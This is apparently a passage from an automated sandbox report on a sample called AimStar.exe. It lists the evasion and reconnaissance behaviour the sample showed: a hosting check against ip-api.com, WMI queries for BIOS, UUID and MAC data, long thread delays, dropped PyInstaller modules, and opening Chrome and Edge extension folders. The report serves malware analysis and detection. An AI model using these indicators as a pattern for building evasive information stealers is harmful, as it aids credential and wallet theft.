              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\getmac.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.3.0
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87C632A str word ptr [rax+63h]2_2_00007FF8A87C632A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8322Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1129Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8434Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1075Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4508
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1150
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 876
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3635
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1959
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5551
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 490
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3376
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3284
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 668
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2643
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1579
              Source: C:\Users\user\Desktop\AimStar.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72842\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72842\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72842\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72842\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72842\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72842\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72842\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72842\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72842\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72842\_hashlib.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.dllJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72842\python313.dllJump to dropped file
              Source: C:\Users\user\Desktop\AimStar.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72842\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeEvaded block: after key decisiongraph_88-39457
              Source: C:\Users\user\Desktop\AimStar.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17363
              Source: C:\Users\user\Desktop\AimStar.exeAPI coverage: 5.1 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756Thread sleep count: 8322 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764Thread sleep count: 1129 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7832Thread sleep time: -8301034833169293s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752Thread sleep count: 8434 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760Thread sleep count: 1075 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep time: -10145709240540247s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5528Thread sleep count: 4508 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4464Thread sleep count: 1150 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 344Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6648Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3620Thread sleep count: 876 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7920Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844Thread sleep time: -12912720851596678s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7424Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\SIHClient.exe TID: 7948Thread sleep time: -90000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4760Thread sleep count: 5551 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep count: 490 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7644Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7984Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7688Thread sleep count: 3376 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7688Thread sleep count: 100 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 180Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7304Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7428Thread sleep count: 3284 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460Thread sleep count: 668 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5232Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3608Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632Thread sleep count: 2643 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632Thread sleep count: 1579 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\SIHClient.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\SIHClient.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\System32\SIHClient.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\System32\SIHClient.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\System32\tree.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F492F0 FindFirstFileExW,FindClose,0_2_00007FF710F492F0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F483B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF710F483B0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F618E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF710F618E4
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F492F0 FindFirstFileExW,FindClose,2_2_00007FF710F492F0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F483B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF710F483B0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F618E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF710F618E4
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139746EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,88_2_00007FF7139746EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71396E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,88_2_00007FF71396E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139B88E0 FindFirstFileExA,88_2_00007FF7139B88E0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A8761240 GetSystemInfo,2_2_00007FF8A8761240
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi\Jump to behavior
              Source: getmac.exe, 00000040.00000002.2189796166.0000027DE9624000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000040.00000003.2188342279.0000027DE95FA000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000040.00000003.2188661666.0000027DE960E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
